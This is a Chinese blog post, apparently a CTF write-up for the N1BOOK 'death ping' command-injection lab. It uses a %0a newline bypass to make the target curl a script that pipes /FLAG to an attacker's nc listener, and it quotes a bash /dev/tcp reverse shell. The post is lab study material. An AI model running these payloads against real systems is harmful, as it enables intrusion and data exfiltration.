BUU N1BOOK题目死亡ping命令

最新推荐文章于 2024-11-13 22:36:43 发布
最新推荐文章于 2024-11-13 22:36:43 发布
阅读量881 收藏 3
点赞数 2
分类专栏: 学习笔记 web练习 docker环境搭建 文章标签: 安全 web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48876267/article/details/121623917
版权

介绍:路由器管理台经常存在的网络ping测试,开发者常常会禁用大量的恶意字符串

version: "3.2"

services:
  converter:
    image: registry.cn-hangzhou.aliyuncs.com/n1book/web-command:latest
    ports:
      - 80:80

本地搭建docker-compose

打开题目

image.png

输入127.0.0.1&&id,发现报错。存在恶意字符过滤

image.png

抓包进行fuzz扫描测试

fuzz字典

"~","!","@","#","$","%","^","&","*","(",")","-","_","\\","[","]"," ' ","%0a","%0b","%0c","%0d"

image.png

两个回显长度,不一致。

测试%0a是否可以绕过

image.png

image.png

说明可以绕过

在本地攻击机中写入shell文件 1.sh

ls
cat /FLAG | nc 自己的攻击机 4444

由于docker是没有bash、python程序的,并且sh反弹是不行的

bash -i >& /dev/tcp/127.0.0.1/4444 0>&1

开启apache服务,可以通过网络访问1.sh

抓包,让靶机下载1.sh

127.0.0.1%0acurl 攻击机ip > /tmp/1.sh

image.png

下载到/tmp/sh.sh

给这个sh脚本加权限

127.0.0.1%0achmod 777 /tmp/sh.sh

在攻击机中开启监听端口 4444

nc -lvvp 4444

在靶机中运行sh脚本取得flag

image.png

clusters of stars
关注
专栏目录
BUU-N1BOOK-Web
楼阁de猫的博客
12-11 1235
web入门[第一章 web入门]常见的信息搜集[第一章 web入门]粗心的小李 [第一章 web入门]常见的信息搜集 考查知识点: 1.常规文件:robots.txt 2.gedit备份文件 3.vim备份文件 首先看robots.txt: 访问一下这个文件得到flag1 再看一下原始文件ihdex.php,发现什么都没有,之前用dirsearch扫了很多东西出来,试了/.git发现也不对,这里就看到书上讲到了gedit备份文件,它是以 ~ 为后缀的,试试index.php~,有东西了,拿到flag
《从0到1:CTFer成长之路》书籍配套题目-[第二章 web进阶]死亡ping命令
weixin_46703850的博客
02-26 3491
《从0到1:CTFer成长之路》书籍配套题目-[第二章 web进阶]死亡ping命令
死亡ping
天道酬勤
11-08 534
h3ping
N1网络命令-ping
weixin_34380296的博客
04-24 368
ping 参数 -c 指定次数 root@ubuntu17:~# ping -c 2 www.baidu.com PING www.a.shifen.com (111.13.100.92) 56(84) bytes of data. 64 bytes from 111.13.100.92 (111.13.100.92): icmp_seq=1 ttl=51 time=19.0 ms 64 byte...
从0到1:CTFer的成长之路死亡ping命令
一个努力学习网安的小牛马
10-26 236
死亡ping命令
从0到1:CTFer成长之路——死亡 Ping 命令
weixin_51559599的博客
10-26 442
手动尝试慢脚本生成可打印字符,后面拼接命令bp 爆破出现中文乱码设置编码爆破最终发现转义后的%0A拼接时未被过滤。
BUU N1BOOK [第二章 web进阶]死亡ping命令
SwBack的博客
09-02 2390
存在以下黑名单过滤 ["$", "{", "}", "`", ";", "&", "|", "(", ")", "\"","'", "~", "!", "@", "#", "%", "^", "*", "[", "]", "\\", ":", "-", "_"]; 但是发现%0a可以执行命令 准备工作 一台具备公网IP的服务器 我这里采用的是自己的服务器,没有服务器的可以注册个小号,在BUU平台开启如下环境 首先在公网服务器上面写入shell文件 内容如下 a=`cat /FLAG` c.
BUUCTF--[第二章 web进阶]死亡ping命令
qq_45414878的博客
11-13 7615
BUUCTF–[第二章 web进阶]死亡ping命令 开启环境发现是一个ping的页面,并且过滤了许多字符 fuzz测试如下
[实验室每日一题][20201123][Web]死亡ping命令
m0_50317371的博客
12-02 3866
题目BUUCTF–[第二章 web进阶]死亡ping命令 前置基础(本题会用到的相关命令) liunx命令 ls命令 Linux ls(英文全拼:list files):命令用于显示指定工作目录下之内容(列出目前工作目录所含之文件及子目录)。 转自:菜鸟教程 cat命令 cat(英文全拼:concatenate):命令用于连接文件并打印到标准输出设备上。 转自:菜鸟教程 curl命令 curl(英文全拼:CommandLine Uniform Resource Locator):curl 是常用的命令
BUUCTF---死亡Ping详解
qq_49422880的博客
05-25 3615
BUUCTF-GXYCTF2019 ping ping ping前言知识点总结关于通配符总结 前言  &esmp;昨晚半夜在一个大佬的博客里看到了个名叫BUUCTF的一个刷题的地方,心想大佬都在上面玩,我这波怎么不得在上面留下自己的痕迹,第二天就直接上手,也就遇到了ping 这题,这不简单直接连刷两题,因为之前也接触过关于ping的题,然而就在GXYCTF2019上的一篇WP上,刷新了我对绕过的认识,于是乎写下本博客记录所学知识点。 知识点总结 先上题目为敬: 疯狂暗示!!!首先我们这里先随便测
ScreenToGif.exe
08-29
是一款免费开源的Gif动画录制神器,没有任何广告!功能强大的编辑器,它有录制屏幕、录制摄像头、录制画板、图像编辑器等功能,可以将屏幕任何区域及操作过程录制成GIF格式的动态图像,有很多选择!您可以编辑录音,甚至可以编辑其他来源的gif,或者您可以导出为Gif,视频或另存为项目以供以后编辑。
BUU CTF [GXYCTF2019]Ping Ping Ping 1
qiaopeifan的博客
01-26 508
BUU CTF [GXYCTF2019]Ping Ping Ping 1打开题目,页面显示/?ip= 应该是一个传参的提示。 结合题目ping。尝试?ip=1 1.看到ip很明显传一个Ip看看 作为菜鸟,我根据自己的判断认为通过Ip传输方式认为是linux所以我们可以在这里输入linux命令常用的就是ls 2.我们看到两个文件,完了进行访问,但是发现flag.php访问不了,大概是说有空格, 判断目标网站是对空格进行了过滤,我们可以使用一些方法代替空格来起到分割作用 注:%20(space)、%09(t
[BUUCTF-N1BOOK]-【信息收集】[第一章 web入门]常见的搜集
羊柳树的博客
11-11 3662
项目场景: 提示:这里简述项目相关背景: 例如:项目场景:示例:通过蓝牙芯片(HC-05)与手机 APP 通信,每隔 5s 传输一批传感器数据(不是很大) 问题描述: 提示:这里描述项目中遇到的问题: 例如:数据传输过程中数据不时出现丢失的情况,偶尔会丢失一部分数据 APP 中接收数据代码: @Override public void run() { bytes = mmInStream.read(buffer); mHandler.obta
buuctf[GXYCTF2019]Ping Ping Ping
hintll的博客
03-21 5322
buuctf[GXYCTF2019]Ping Ping Ping 这个题目的标题是pingping盲猜是关于命令执行的题目 打开环境后 只有一个/ip=? 应该是提示用get的方式来传参一个地址执行ping的操作 直接ping127.0.0.1 回显ping127.0.0.1的数据 说明是一道命令执行的题目 执行:?ip=127.0.0.1|ls 其中|的作用是命令分隔符 还有相关的符号 ; --在 shell 中,是”连续指令” & --不管第一条命令成功与否,都会执行第二条命令 &
反弹shell
chenkaifang的博客
07-14 254
参考链接: https://xz.aliyun.com/t/2549 1、介绍 reverse shell,就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接...
[第二章 web进阶]死亡ping命令
最新发布
shierbai的博客
11-13 336
127.0.0.1%0acurl B/1.sh > /tmp/1.sh #请求bash文件到tmp目录。1.先在B上面写一个1.sh文件里面是读取flag的命令,同时命令连接符去做目标主机端口监听。127.0.0.1%0achmod 777 /tmp/1.sh #给bash加权限。这里不想搞公网ip去做操作,看了一下别人用小号搞了一台内网主机。这里试了很多连接符,发现只有%0a可以绕过。这样会在B机器上面得到发过来的flag。2.然后通过命令注入让A执行。3.命令注入让A执行。
BUUCTF-N1BOOK-WP
weixin_42782443的博客
04-05 1387
BUUCTF-N1BOOK-WP[第一章 web入门]常见的搜集粗心的小李SQL注入-1SQL注入-2afr_1afr_2afr_3[第二章 web进阶]SSRF Training死亡ping命令XSS闯关文件上传[第三章 web进阶][第四章 CTF之APK章][第五章 CTF之RE章][第六章 CTF之PWN章] [第一章 web入门] 常见的搜集 粗心的小李 SQL注入-1 SQL注入-2 afr_1 afr_2 afr_3 [第二章 web进阶] SSRF Training 死亡ping命令 XSS
buuctf:Ping Ping Ping命令执行)
zzqzzq11的博客
08-06 1390
buuctf
nu1l-死亡ping命令攻略
qq_58683895的博客
10-26 567
本文展示了从0到1成长之路ctfer-nu1l的死亡ping命令如何获取flag,并且包含了靶机在不同网络环境下的处理方法
buu crackrtf
09-26
BUU CrackRTF是一个密码破解题目,其中涉及到了密码的加密和解密过程。在分析代码的过程中,我们可以看到有两个函数sub_40100F和sub_401005。sub_40100F函数是从AAA文件中取出字符和密码进行异或操作,而sub_401005...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值